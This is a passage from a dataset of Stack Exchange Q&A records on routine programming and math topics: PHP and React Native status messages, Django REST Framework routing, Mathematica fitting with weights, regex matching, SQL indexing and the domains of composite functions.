\nBasically I wanted to know if the query in PHP work and use my application to notify the user.\nis there any way or method to do so?\nI using this method to fetch data from PHP in my React Native App\n<code>RecipeUpdation = () =>{\n const { ID } = this.state ;\n const { Name } = this.state ;\n const { Type } = this.state ;\n const { Ingredient } = this.state ;\n const { Step } = this.state ;\n\n return fetch('https:\/\/www.update.php', {\n method: 'POST',\n headers: {\n 'Accept': 'application\/json',\n 'Content-Type': 'application\/json',\n },\n body: JSON.stringify({\n\n RecipeID : ID,\n RecipeName : Name,\n RecipeType : Type,\n RecipeIngredient: Ingredient,\n RecipeStep: Step\n\n })\n\n }).then((response) => response.json())\n .then((responseJson) => {\n }).catch((error) => {\n console.error(error);\n });\n\n }\n<\/code>\nAnswer: Basically we can verify if the Operation in PHP is successful or not by Checking the Query Execution Status. A very Basic way to do the checking is using <code>If Else<\/code> to see if the Query Function return <code>True<\/code>(Success) or <code>False<\/code>(Fail). You can also always return some Message through <code>JsonResponds<\/code>.\nHere some example Code for PHP checking and Return Some Message:\n<code>\/\/ Using If Else to Check if operation Success or Not\nif(mysqli_query($connection,$Your_Query)){\n\n$MSG = 'Success' ;\n\n\/\/ Convert message into Json format first\n$json = json_encode($MSG);\n\n\/\/ This is where it return the message to Application.\n echo $json ;\n\n }\n else{\n\n $MSG = 'Failed' ;\n\n $json = json_encode($MSG);\n\n echo $json ;\n }\n<\/code>\nIn your Application Code you already have the implementation to retrieve the <code>JsonResponds<\/code>(the Message) which have been <code>echo<\/code> in the PHP Code, I would suggest use a simple method which is <code>Alert<\/code> to pop out the message in your React Native Application to notify the User the Operation Status.\n<code> }).then((response) => response.json())\n .then((responseJson) => {\n\n \/\/ this responseJson Already have the echo Message from PHP\n \/\/ just Display the Status with Alert Function\n Alert.alert(responseJson);\n\n }).catch((error) => {\n console.error(error);\n });\n<\/code>\nHope this would help.\n","meta":{"source":"stackoverflow","title":"PHP Webhost Operation Checking","dup_signals":{}},"subset":"stackexchange"} +{"text":"Why this works, when it shouldnt ? passing by reference\n\nQuestion: Here is standard <code>Yii2<\/code> <code>SearchModel<\/code> <code>search<\/code> action\n<code>public function search($params, $cond)\n{\n $query = Service::find();\n\n $dataProvider = new ActiveDataProvider([\n 'query' => $query,\n ]);\n\n $this->load($params);\n\n $query->where(['param' => $value]); \/\/why this modified after it passed to provider?\n\n return $dataProvider;\n}\n<\/code>\nWhy theres <code>$query<\/code> is modified AFTER is passed as parameter to <code>ActiveDataProvider<\/code> and it works ? How array with params keeping reference to <code>$query<\/code> ?\nComment: Objects are always references, except if you clone it explicitly\nComment: [passing by reference](http:\/\/php.net\/manual\/en\/language.references.pass.php) is 'declared' in the function declaration, not when calling the function (=at runtime).\nComment: this `public function __construct($config = [])` is the declaration of the BaseObject, which `ActiveDataProvider` inherites from. 
Just for info (because I was searching for it).\nComment: But inside anonymous parameter, how it is possible ?\nComment: `$query` is passed in an array. So the prototype of `ActiveDataProvider` will have a parameter defined as an array\nComment: Thanks, I did search whole extend chain and not found BaseObject, only Object without __construct\nAnswer: <code>ActiveQuery<\/code> is mutable object, and in PHP objects are always passed by reference. In your case reference to <code>$query<\/code> is assigned to <code>$dataProvider->query<\/code>, so <code>$query<\/code> and <code>$dataProvider->query<\/code> points to the same object. Any modification of <code>$query<\/code> will be also reflected on <code>$dataProvider->query<\/code>.\nYou may read more about this in PHP documentation.\n","meta":{"source":"stackoverflow","title":"Why this works, when it shouldnt ? passing by reference","dup_signals":{}},"subset":"stackexchange"} +{"text":"how to improve image quality on Canvas.drawBitmap while merging two images?\n\nQuestion: I am using following code to merge 2 different bitmap into 1. \n<code>public Bitmap combineImages(Bitmap c, Bitmap s) { \nBitmap cs = null;\nint width, height = 0;\n\nwidth = c.getWidth() + (s.getWidth() \/ 2);\nheight = c.getHeight() + (s.getHeight() \/ 2);\n\ncs = Bitmap.createBitmap(width, height, Bitmap.Config.ARGB_8888);\n\nCanvas comboImage = new Canvas(cs);\n\ncomboImage.drawBitmap(c, 0f, 0f, null);\ncomboImage.drawBitmap(s, c.getWidth() - (s.getWidth() \/ 2), c\n .getHeight()\n - (s.getHeight() \/ 2), null);\nreturn cs;\n<\/code>\n}\nIt working good. But problem is that it make my image BLUR.\nBasically my full code is here. My Full Code What I am doing is converting my Base64 String images to Bitmap. What you think this may be issue?\nI just want to prevent BLUR to my images...\nComment: oh yes, I just make the 3 images of hdpi,mdpi,ldpi \"+\" image. and it works for me.\nWell you should not answer , but comment on my question.\nAnswer: oh yes, I just make the 3 images of hdpi,mdpi,ldpi \"+\" image with appropriate resolution. and it works for me.\n","meta":{"source":"stackoverflow","title":"how to improve image quality on Canvas.drawBitmap while merging two images?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Possible whitespace issue importing numbers from a text file. NonLinearModel crashes the kernel when weights are given\n\nQuestion: Update:\nThe data has been made available as a text file.\nIt is desired to use the <code>Weights<\/code> option with <code>NonlinearModelFit<\/code> and the direct coding gives the error message \"Wolfram Kernel for Windows has stopped working.\" Below the commands are given the import the data and run a few models. 
The first two work fine; the last one gives the error message given above.\n<code>data = Import[\"sample_data.txt\", \"Table\"];\n\n(* Create data for NonlinearModelFit *)\ndataWeights = data[[All, 3]];\ndataSpectrum = data[[All, {1, 2}]];\ndataWeightsN = dataWeights\/Max[dataWeights];\n\n(* This works *)\nnlm1 = NonlinearModelFit[dataSpectrum, a (x\/150.0)^(-2) + b (x\/150.0)^(-1),\n {{a, 449}, {b, -177}}, x];\nnlm1[\"BestFitParameters\"]\n(* {a -> 440.0413493307273`,b -> -174.44382871465248`} *)\n\n(* This works: dataSpectrum is multiplied by 1.0 and the Weights option is added *)\nnlm2 = NonlinearModelFit[1.0*dataSpectrum, a (x\/150.0)^(-2) + b (x\/150.0)^(-1),\n {{a, 449}, {b, -177}}, x, Weights -> dataWeightsN];\n\nnlm2[\"BestFitParameters\"] \n(* {a -> 430.15765125168565`,b -> -156.68960890633196`} *)\n\n(* This doesn't work. Original data and model with Weights are used *)\n(* Error message is \"Wolfram Kernel for Windows has stopped working\" *)\nnlm3 = NonlinearModelFit[dataSpectrum, a (x\/150.0)^(-2) + b (x\/150.0)^(-1),\n {{a, 449}, {b, -177}}, x, Weights -> dataWeightsN]\n<\/code>\nEnd of update\nHas anyone experience corruption while importing numbers from a textfile?\nThe issue I have is that nonlinear model fitting completes only without a weighting function, but the issue goes away if I modify my lists and arrays by multiplying them by 1.0 before feeding them to the NLM function. (or manually cutting and pasting the array values into the code works too, but that is way too manual as I may have to analyze 100 data sets)\nExample:\nI have 25 ordered pairs of numbers I wish to fit using NLM\ndataList={{90.5125000, 1001.3813546}, {91.5,977.38053}, {92.56, 966.23423}, and so on}.\nI have a weights list of 25 values in a list like\ndataWeights={0.85836, 0.577296, 0.2, 0.68656, 1, 0.23434, and so on}\nThis call doesn't work (meaning all variables turn blue)\n<code> z = NonlinearModelFit[datalist, a (x\/150.0)^(-2) + b(x\/150.0)^(-1), {a,b}, x, Weights -> dataWeights];\n<\/code>\nbut this one works\n<code>z = NonlinearModelFit[datalist, a (x\/150.0)^(-2) + b(x\/150.0)^(-1), {a,b}, x];\n<\/code>\nHowever, if I issue the command:\n<code>datalist=1.0*datalist;\n<\/code>\nboth calls work or if I cut and paste, both calls work.\ndatalist was created by the following Code\n<code>data = Import[\"filename.txt\", \"Table\"];\ndataWeights = data[[1 ;;, 3]];\ndatalist = data[[1 ;;, 1 ;; 2]];\n<\/code>\nSorry that I don't provide the data, as the problem goes away if I enter all of the data into this question with a cut and paste.\nSo the question boils down to Mathematica 11.1 - has anyone had experience with white space issues in text files containing numbers, and if yes, did you figure out what to do with your text file to make sure you didn't get problems in the future.\nComment: What do you mean by \"this one doesn't work\"? Does it give an error, do the values not make sense? Since you haven't included all the data, we cannot possibly reproduce the problem, so you'll need to be explicit about what the problem is.\nComment: end running the issue a bit, but this problem is not a nonlinear fit. (nor was the first one). Have you tried `LinearModelFit`? 
In any case 25 vals is not too much to post, just paste the whole thing into the question.\nComment: You should provide guesses for the parameters in the parameter list, in your case, just one, like {{a, guessforthisparameter}}, otherwise NonlinearModelFit starts evaluating expressions around a=1, where your function may be ill conditioned.\nComment: George, there are higher order polynomials that don't work either, but I did not show them.\nComment: Short answer is that it was a bug in Mathematica. Went away in 11.3\nAnswer: I've taken the weights from your previous post (which had 26 elements) and removed the last data point from above to get 26 elements.\n<code>datalist = {{140.1885986328125, 318.54713569102125}, {140.5792236328125, 316.3740245454749},\n {140.9698486328125, 314.1513044515799}, {141.3604736328125, 312.0074230752567},\n {141.7510986328125, 309.84565604848154}, {142.1417236328125, 307.7355334299345},\n {142.5323486328125 , 305.633670557817}, {142.9229736328125, 303.52814971608547},\n {143.3135986328125, 301.4927654142471}, {143.7042236328125, 299.4417704661457},\n {144.0948486328125, 297.4154292210221}, {144.4854736328125, 295.42313663398266},\n {144.8760986328125, 293.40462468351114}, {145.2667236328125, 291.4606242860452},\n {145.6573486328125, 289.4850824087863}, {146.0479736328125, 287.57533642316},\n {146.4385986328125, 285.65551629016227}, {146.8292236328125, 283.75135460154684},\n {147.2198486328125, 281.86934847149666}, {147.6104736328125, 280.03473502558626},\n {148.0010986328125, 278.1649121557317}, {148.3917236328125, 276.35675418061123},\n {148.7823486328125, 274.51855140060024}, {149.1729736328125, 272.7408232115596},\n {149.5635986328125, 270.96588244643533}, {149.9542236328125, 269.1897259023379}};\n\ndataWeights = {0.9987527, 0.99976478704084643, 0.999722848903, 0.9993126, \n 0.9997489, 0.99974733307567956, 0.98364314121504532, \n 0.99878819613270000, 0.99972987911051269, 0.99919462417872860, \n 0.92152614146854338, 0.99960687021314616, 0.99885219400497854, \n 0.99958609168318560, 0.807542606375684133, 0.358750462322291623, \n 0.99949217272776386, 0.99962266189591619, 0.99880149439187476, \n 0.99953788549367709, 0.99907244642256050, 0.99911067891768793, \n 0.87373801598284525, 0.87409790012176219, 0.98225430427248133, \n 0.515316685575128931};\n\nNonlinearModelFit[datalist, a (x\/150.0)^(-2), {a}, x] \/\/ Normal\n(* 6.16036582770958`*^6\/x^2 *)\n\nNonlinearModelFit[datalist, a (x\/150.0)^(-2), {a}, x, Weights -> dataWeights] \/\/ Normal\n(* 6.163821795620144`*^6\/x^2 *)\n<\/code>\nEverything seems to work fine. You just need to paste in the data and commands that you're having trouble with. If you've read the data from a file, just typing <code>datalist<\/code> and pasting in the output should get us the exact data you're using.\nComment: A pain? I just copied and pasted the data from the *Mathematica* notebook and pasted in the above answer. No pain at all.\nComment: I agree cutting-and-pasting thousands of times is not practical. However, when I mentioned cutting-and-pasting it was about providing a single minimal working example for us to work on.\nComment: Pasting would be a pain. But the simpler work around is easier. This works: datalist=1.0*datalist as well as datalist=Round[datalist, 0.000001]\nComment: I may have thousands of data sets to analyze - method must not have any manual steps, if I understand what you are suggesting.\nAnswer: I discovered that the problem was with my data somehow. 
I'm guessing there is something in the text file that is not importing correctly\nWhen I inserted\n<code>datalist = Round[datalist, 0.000000000001]; \n<\/code>\nor\n<code>datalist=1.0*datalist;\n<\/code>\nthe problem went away.\nVery strange, but it is a simple workaround that is working for me.\nsome bad whitespace somewhere?\nThe original data was imported from a text file with the commands\n<code>data = Import[\"datafile.txt\", \"Table\"];\ndatalist = data[[1 ;;, 1 ;; 2]];\ndatalist = Select[datalist, # != {#, 0} &];\n<\/code>\nComments welcome\nComment: You still haven't given enough information for anyone to make educated comments. We'd really like to solve the issue but we're just not getting clarification from you.\nComment: There you go, but I think the cutting and pasting has removed the issue, although I would have thought the import would have cleaned it up all by itself. I'm not sure how to upload a text file directly.\n","meta":{"source":"mathematica.stackexchange","title":"Possible whitespace issue importing numbers from a text file. NonLinearModel crashes the kernel when weights are given","dup_signals":{}},"subset":"stackexchange"} +{"text":"Should I create separate apns certificate for notification Service Extension and notification Content Extension?\n\nQuestion: I came to know that you have to create separate app Ids and separate provisioning profile for service extensions.When I checked the created ID for notification service extension it shows that push notifications are configurable.Should I create a new apns certificate for it or can i use the base apps apns certificate?\nComment: Yes, otherwise you can't implement push notification and you can follow this tutorial https:\/\/www.appcoda.com\/push-notification-ios\/\nAnswer: After testing it out myself,it is clear that although you have to create separate appIds and provisioning profiles for extensions,you don't need to create separate apns certificate.It will work with the base apns certificate.\nSo the answer is no,it doesn't require creating separate apns certificates.\nComment: Do need to enable Push Notifications\nunder the app services when create the app bundle id for extensions\n?\nComment: @HarshalBhavsar I have enabled the push notifcations but haven't created separate push certificate.\nComment: okey thanks for the update even without enabling it worked for me\n","meta":{"source":"stackoverflow","title":"Should I create separate apns certificate for notification Service Extension and notification Content Extension?","dup_signals":{}},"subset":"stackexchange"} +{"text":"how to do beanutils converter for arraylist to double array\n\nQuestion: I am trying to reconstruct a bean using BeanUtils. The BeanUtils.populate(obj,map) is almost exactly what I need except I think I need a converter as one of the things in the map is an arraylist but the bean needs an array[]. I have tried to write a converter for it but it doesn't go into the convert method. 
Calling populate gives IllegalArgumentException with message 'argument type mismatch'\nBean code:\n<code>public class TestObject implements Serializable \n{\n private double[] data;\n\n public double[] getData() {\n return data;\n }\n public void setData(double[] data) {\n this.data = data;\n }\n}\n<\/code>\nApplication Code:\n<code>public static void main(String[] args)\n{\n ConvertUtils.register(new DoubleArrayConverter(), double[].class);\n Map<String, Object> result = getMap();\n Class<?> clazz = Class.forName(\"com.test.TestObject\");\n Object obj = clazz.newInstance();\n BeanUtils.populate(obj, result);\n}\n<\/code>\nConverter code:\n<code>public class DoubleArrayConverter implements Converter \n{\n \/\/takes in an arraylist and returns a double[]\n public Object convert(Class arg0, Object arg1) \n {\n ArrayList list = (ArrayList)arg1;\n double[] data = Doubles.toArray(list);\n\n return data;\n }\n}\n<\/code>\nAnswer: After adding the Google library that includes Doubles\n<code>import com.google.common.primitives.Doubles;\n<\/code>\nand setting some values into the map\n<code> Map<String, Object> result = new HashMap<String, Object>();\n List<Double> listDouble = new ArrayList<Double>();\n listDouble.add(123.45);\n listDouble.add(678.90);\n result.put(\"data\", listDouble);\n<\/code>\nI was able to run your code and populate the bean. It is important that the map key 'data' agrees with the setData and getData methods.\nAre you sure your Map has an array list in it?\n","meta":{"source":"stackoverflow","title":"how to do beanutils converter for arraylist to double array","dup_signals":{}},"subset":"stackexchange"} +{"text":"add parameter to get_queryset request in Django REST Framework\n\nQuestion: I'm using <code>Django 2.0<\/code> and <code>Django REST Framework<\/code>.\nI have two models in contacts app\ncontacts\/models.py\n<code>class Contact(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n first_name = models.CharField(max_length=100)\n last_name = models.CharField(max_length=100, blank=True, null=True, default='')\n\nclass ContactPhoneNumber(models.Model):\n contact = models.ForeignKey(Contact, on_delete=models.CASCADE)\n phone = models.CharField(max_length=100)\n primary = models.BooleanField(default=False)\n\n def __str__(self):\n return self.phone\n<\/code>\ncontacts\/serializers.py\n<code>class ContactPhoneNumberSerializer(serializers.ModelSerializer):\n class Meta:\n model = ContactPhoneNumber\n fields = ('id', 'phone', 'primary', 'created', 'modified')\n<\/code>\nand contacts\/views.py\n<code>class ContactPhoneNumberViewSet(viewsets.ModelViewSet):\n serializer_class = ContactPhoneNumberSerializer\n\n def get_queryset(self):\n return ContactPhoneNumber.objects.filter(\n contact__user=self.request.user\n )\n<\/code>\nurls.py\n<code>router.register(r'contact-phone', ContactPhoneNumberViewSet, 'contact_phone_numbers')\n<\/code>\nWhat I want is following endpoints\n\nGET: <code>\/contact-phone\/{contact_id}\/<\/code> list phones numbers of particular contact\nPOST:<code>\/contact-phone\/{contact_id}\/<\/code> add phone numbers to particular contact\nPUT: <code>\/contact-phone\/{contact_phone_number_id}\/<\/code> update particular phone number\nDELETE: <code>\/contact-phone\/{contact_phone_number_id}\/<\/code> delete particular phone number\n\n<code>PUT<\/code> and <code>Delete<\/code> can be achieved as default action of <code>ModelViewSet<\/code> but how to make <code>get_queryset<\/code> to accept <code>contact_id<\/code> as required 
parameter?\n\nEdit 2\n\nI followed doc Binding ViewSets to URLs explicitly\nupdate app\/urls.py\n<code>router = routers.DefaultRouter()\nrouter.register(r'contacts', ContactViewSet, 'contacts')\ncontact_phone_number_view_set = ContactPhoneNumberViewSet.as_view({\n 'get': 'list\/<contact_pk>\/',\n 'post': 'create\/<contact_pk>\/',\n 'put': 'update',\n 'delete': 'destroy'\n})\nrouter.register(r'contact-phone-number', contact_phone_number_view_set, 'contact_phone_numbers')\n\nurlpatterns = [\n path('api\/', include(router.urls)),\n url(r'^admin\/', admin.site.urls),\n]\n<\/code>\nBut it is giving error \n<code>AttributeError: 'function' object has no attribute 'get_extra_actions'\n<\/code>\nAnswer: You can add extra actions to the viewset using <code>@action<\/code> decorator:\n<code>class ContactPhoneNumberViewSet(viewsets.ModelViewSet):\n serializer_class = ContactPhoneNumberSerializer\n\n def get_queryset(self):\n return ContactPhoneNumber.objects.filter(\n contact__user=self.request.user\n )\n\n @action(methods=['post'], detail=False)\n def add_to_contact(self, request, contact_id=None):\n contact = Contact.objects.get(id=contact_id)\n serializer = ContactPhoneNumberSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save(contact=contact)\n return Response(serializer.data)\n else:\n return Response(serializer.errors,\n status=status.HTTP_400_BAD_REQUEST)\n\n @action(methods=['get'], detail=False)\n def set_password(self, request, contact_id=None):\n contact = Contact.objects.get(id=contact_id)\n serializer = PasswordSerializer(contact.contactphonenumber_set.all(), many=True)\n return Response(serializer.data)\n<\/code>\nUPD\nSince you don't need additional actions, you can override <code>retrieve<\/code> and <code>create<\/code> defaults methods:\n<code>class ContactPhoneNumberViewSet(viewsets.ModelViewSet):\n serializer_class = ContactPhoneNumberSerializer\n\n def get_queryset(self):\n return ContactPhoneNumber.objects.filter(\n contact__user=self.request.user\n )\n\n def create(self, request, pk=None):\n contact = Contact.objects.get(id=contact_id)\n serializer = ContactPhoneNumberSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save(contact=contact)\n return Response(serializer.data)\n else:\n return Response(serializer.errors,\n status=status.HTTP_400_BAD_REQUEST)\n\n def retrieve(self, request, pk=None):\n contact = Contact.objects.get(pk=pk)\n serializer = PasswordSerializer(contact.contactphonenumber_set.all(), many=True)\n return Response(serializer.data)\n<\/code>\nTo change standard <code>create<\/code> url use explicitly url binding:\n<code>contact_list = ContactPhoneNumberViewSet.as_view({\n 'get': 'list',\n 'post': 'create',\n 'put': 'update',\n 'delete': 'destroy'\n})\n\nurlpatterns = [\n path('api\/\/contact-phone\/<int:pk>\/', contact_list, name='contact-list'),\n url(r'^admin\/', admin.site.urls),\n]\n<\/code>\nComment: @AnujTBE Not sure, but I think it's impossible. The problem is you need somehow to deside inside `get_queryset` method if selected `kwarg` was `contact_phone_number_id` or `contact_id`. But without extra actions you cannot distinguish them.\nComment: Thanks for your help. used your first answer by defining extra action.\nComment: @AnujTBE Don't have chance to test it. 
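Regarding the follow-up about addressing one contact's phone numbers without a separate ViewSet: one option hinted at in the comments is <code>url_path<\/code> with a capture group, since DRF's default routers splice <code>url_path<\/code> into the route regex and pass named groups to the action as kwargs. This is a sketch only, untested here, reusing the thread's model and serializer names (imported from the app, not shown):\n<code>from rest_framework import status, viewsets\nfrom rest_framework.decorators import action\nfrom rest_framework.response import Response\n\nclass ContactPhoneNumberViewSet(viewsets.ModelViewSet):\n    serializer_class = ContactPhoneNumberSerializer\n\n    def get_queryset(self):\n        return ContactPhoneNumber.objects.filter(contact__user=self.request.user)\n\n    # GET\/POST \/contact-phone\/by-contact\/<contact_pk>\/ address one contact's numbers\n    @action(methods=['get', 'post'], detail=False,\n            url_path='by-contact\/(?P<contact_pk>[^\/.]+)')\n    def by_contact(self, request, contact_pk=None):\n        contact = Contact.objects.get(pk=contact_pk, user=request.user)\n        if request.method == 'POST':\n            serializer = ContactPhoneNumberSerializer(data=request.data)\n            if serializer.is_valid():\n                serializer.save(contact=contact)\n                return Response(serializer.data)\n            return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n        serializer = ContactPhoneNumberSerializer(\n            contact.contactphonenumber_set.all(), many=True)\n        return Response(serializer.data)\n<\/code>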
Try to use action's url_path argument like this: `@action(methods=['post'], detail=False, url_path='delete_phone\/\/')`.\nComment: then I would have to disable `get_queryset` and `create` methods, because I do not want to list all phone numbers at once.\n\nAlso I want clean URL without adding extra action. can't I pass required additional parameter to `get_querset`?\nComment: distinguishing is based on request methods. with request methods `GET` and `POST` **contact_id** will be passed and with rest **contact_phone_number_id** will be passed.\nComment: @AnujTBE, Ah, yes it makes sense. I missed it. Probably binding viewset explicitly can help you also, check this part of the docs: http:\/\/www.django-rest-framework.org\/tutorial\/6-viewsets-and-routers\/#binding-viewsets-to-urls-explicitly Sorry dont have any other ideas at this time.\nComment: please see `Edit 2`\nComment: is there any way I can take `api` urls outside of `urlpatterns`. There should be only `api\/` in the `urlpatterns` others outside\nComment: @AnujTBE you can create separate `urls2.py` file, add there `path('contact-phone\/\/', contact_list, name='contact-list'),`. And include it to the main urls.py: `path('apu\/', include('urls2')),`. See this doc for details: https:\/\/docs.djangoproject.com\/en\/2.0\/topics\/http\/urls\/\nComment: Let us [continue this discussion in chat](https:\/\/chat.stackoverflow.com\/rooms\/171371\/discussion-between-anuj-tbe-and-neverwalkaloner).\nComment: can I pass `many=True` so that I could create multiple `phone_number` object? It's working fine for single object.\nComment: @AnujTBE I suppose it should work. Just pass with request list of objects and add many=True to serializer: `serializer = ContactPhoneNumberSerializer(data=request.data, many=True)`\nComment: Thanks. One more little help needed. Can I pass extra `kwargs` to the action so that I could implement `update` and `delete` methods on `phone_numbers` in the same `ViewSet` instead of writing a separate `ViewSet` like `url\/contact\/\/delete_phone\/\/`\nComment: I tried, but it gives `page not found` error. You can see https:\/\/stackoverflow.com\/q\/50425262\/3719167 for more detail\n","meta":{"source":"stackoverflow","title":"add parameter to get_queryset request in Django REST Framework","dup_signals":{}},"subset":"stackexchange"} +{"text":"best optimized sql query to select a single record name Jack from the list of 100 million record\n\nQuestion: best optimized performance specific sql query to select a single record name Jack from the list of 100 million record without using index\n<code>select name \nfrom table t1 \nwhere name = 'JACK' -- normal query \n<\/code>\nComment: https:\/\/use-the-index-luke.com\/\nComment: There is no other way to write this query. If you need to improve performance, you need an index (see Mudassir's link). Performance questions also heavily depend on the database product being used. \"SQL\" is just a query language, not the name of a specific product. Please add a [tag](https:\/\/stackoverflow.com\/help\/tagging) for the database product you are using `postgresql`, `oracle`, `sql-server`, `db2`, ...\nAnswer: Make index on your table\n<code>CREATE INDEX idx01 ON YOUR_TABLE_NAME (name);\n<\/code>\nComment: If there is no such index the best thing you can do for first is to ask someone who have permission to do it. 
If you use correct index, the query become a lot more faster.\nComment: what if we don't have permission to set up an index\n","meta":{"source":"stackoverflow","title":"best optimized sql query to select a single record name Jack from the list of 100 million record","dup_signals":{}},"subset":"stackexchange"} +{"text":"RegExp not getting everything after the first two new lines\n\nQuestion: I am trying to get everything after the first two <code>newlines<\/code> or <code>carriage returns<\/code>.\nI have tried this, but it isn't working. The third item in the array should be 5 lines, but it is only returning the first line after the two newlines. I tried using the <code>m<\/code> modifier but that isn't working either.\nWhat am I missing?\n\n<code>let text = `asdf\n\nasdfsdf\nasdf\n\nasdf\n23423\n\ndsfddfff`\nlet matches = text.match(\/^.+(\\r\\n\\r\\n|\\n\\n)(.+)\/)\nconsole.log(matches)<\/code>\nAnswer: You need the <code>s<\/code> modifier to make the dot match a newline, so that your final group captures everything afterwards. Also, when you do that, you'll need to alter the original <code>^.+<\/code> to make it match as little as possible, rather than as much as possible - so, make it lazy with <code>.+?<\/code>:\n\n<code>let text = `asdf\n\nasdfsdf\nasdf\n\nasdf\n23423\n\ndsfddfff`\nlet matches = text.match(\/^.+?(\\r\\n\\r\\n|\\n\\n)(.+)\/s)\nconsole.log(matches)<\/code>\n\nOr, for environments that don't support the <code>s<\/code> modifier, use the character set <code>[\\s\\S]<\/code> to match any character:\n\n<code>let text = `asdf\n\nasdfsdf\nasdf\n\nasdf\n23423\n\ndsfddfff`\nlet matches = text.match(\/^[\\s\\S]+?(\\r\\n\\r\\n|\\n\\n)([\\s\\S]+)\/)\nconsole.log(matches)<\/code>\nComment: Is it in ecmascript2018 already? I still see the s modifier as stage 4 proposal, unsure where it is already implemented.\nComment: You're right, it's probably too new to rely on fully, I mistakenly assumed it was OK because it worked in my browser.\nComment: I'm using it in node and it is supported there\nComment: Probably a better pattern would be `\/(?:r?\\n){2}([\\s\\S]+)\/`. I doubt the first `^[\\s\\S]*?` makes any sense if that substring is not going to be used.\nComment: another way to match all characters: `[^]`\nComment: @Thomas I don't think `[^]` is great to use because it only works in Javascript (or, at least, is invalid syntax in other common regex flavors) - it can easily lead to confusion, while `[\\s\\S]`'s meaning should be clear everywhere.\n","meta":{"source":"stackoverflow","title":"RegExp not getting everything after the first two new lines","dup_signals":{}},"subset":"stackexchange"} +{"text":"Composite functions\n\nQuestion: How would you describe the existence of a composite function $f(g(x))$in terms of range of $g$ and domain of $f$ . Does range of $g$ need to be subset of domain of $f$ or is it sufficient if the two sets have intersection only? \nI used to define composite function if range of $g$ is a subset of domain of $f$ and in that case domain of the composite function is same as domain of the function $g$ but I have come across questions where only intersection exists. In that type of situation domain of composite function can not be the domain of $g$. I have this issue related to high school mathematics. Could you please help me to find the most appropriate way of describing the issue to the students relevant to their level of studies . 
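\nIn symbols, the convention I am asking about would read $\\operatorname{dom}(f\\circ g)=\\{\\,x\\in\\operatorname{dom} g \\;:\\; g(x)\\in\\operatorname{dom} f\\,\\}$, that is, the preimage of $\\operatorname{dom} f$ under $g$; my question is whether this set, rather than all of $\\operatorname{dom} g$, should serve as the domain of the composite when the two sets merely intersect.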
\nFor further clarification here you have examples \n\nLet $f(x) = x^2$ and $g(x) = \\sqrt{x-1}$.\nHere range of $g$ is a subset of domain of $f $, therefore $f(g(x)) = x -1$ exists. Now the issue is can you say $f(g(0))= - 1$ because 0 is not in the domain of $g$?\n\nLet $f(x)= x + 2$ and $g(x) = 1\/(x - 1)$.\n Here range of $f$ is not a subset of domain of $g$ , now what about $g(f(x)) = 1\/(x+1)$, how can you explain the way to obtain domain of this composite function because here that is not the same domain of $f$?\n\nDo we need to treat finding expression for $g(f(x))$ and finding composite function $g(f(x))$ in two different ways?\nEdited \nBy going through the suggested answers following are the conclusions I could able to make , \n\nWhen the terms function or domain not mention in the question we can treat$ f(g(x))$ as an expression and substitute any real value to $x$ if output is real. \nWhen the domain of $f$ and $g$ are given $f(g(x))$ can be defined if range of $g$ is a subset of domain of $f$. \nWhen domain of $f$ and $g$ are not given we have to determine the domain of $g$ such that range of $g$ is a subset of domain of $f$ and range of $f(g(x))$ should be determined according to the selected domain of $g$. \nIf you have any exceptions please mention it in your answers or comment about it so that we can make the final conclusion.\nComment: This is definitely a teaching question: which convention is better to teach and how to explain it to students.\nComment: This is a question about mathematics, not about math education.\nComment: @TomKern thanks for understanding the real meaning and the value of the issue. I too believe this is much better platform to clear doubts related to different approaches in teaching.\nAnswer: Before addressing some of the issues directly, let me mention what I think is the standard approach in mathematics. A function is typically defined together with its domain and codomain, so saying \"function $f$\" is a shorthand for \"function $f \\colon A \\to B$\" (where $B$ is the codomain and potentially the range $f(A)$ is a proper subset of $B$). And then, the standard way of introducing composition is to require two functions $f \\colon A \\to B$, $g \\colon B \\to C$ to have matching (co)domains and let $g \\circ f \\colon A \\to C$, $(g \\circ f) (x) = g(f(x))$.\nOf course, this is not the only option. If $f \\colon A \\to B$ and $g \\colon B' \\to C$ don't have matching (co)domains but $B' \\subseteq B$ (typically $B = \\mathbb{R}$), you can still define $g \\circ f$ on the set $A' := f^{-1}(B')$ by $(g \\circ f) \\colon A' \\to C$, $(g \\circ f)(x) = g(f(x))$. It's mostly a pedagogical choice. If one wanted to be pedantic and stick to the previous definition, one would just have to use the composition $g \\circ f|_{A'}$ (with $f$ replaced by its restriction).\nIt's probably best to stick with whatever your primary reference for the subject uses.\n\nNow, there's a type of problems where a function is only given by an expression (say, $\\frac{1}{x}$) and the student is required to find the set of all $x$'s for which the expression makes sense, the so called natural domain (here it would be $\\mathbb{R} \\setminus \\{0\\}$).\nHowever, it's important to make a distinction between a function and an expression. Formally, in problems like the one above you are given an expression and asked to make it into a function. 
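\nTo make the \"natural domain\" reading concrete, here is a small illustration of my own (a sketch, not part of the original discussion): treat each formula as a rule and keep only the sample inputs on which evaluation succeeds.\n<code>import math\n\ndef natural_domain_sample(rule, candidates):\n    # keep the sample inputs for which the formula returns a real number\n    kept = []\n    for x in candidates:\n        try:\n            rule(x)\n        except (ValueError, ZeroDivisionError):\n            continue  # evaluation failed: x lies outside the natural domain\n        kept.append(x)\n    return kept\n\ng = lambda x: math.sqrt(x - 1)\nf = lambda x: x ** 2\n\nprint(natural_domain_sample(g, range(-2, 4)))                    # [1, 2, 3]\nprint(natural_domain_sample(lambda x: f(g(x)), range(-2, 4)))    # also [1, 2, 3]\nprint(natural_domain_sample(lambda x: x - 1, range(-2, 4)))      # every sample point\n<\/code>\n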
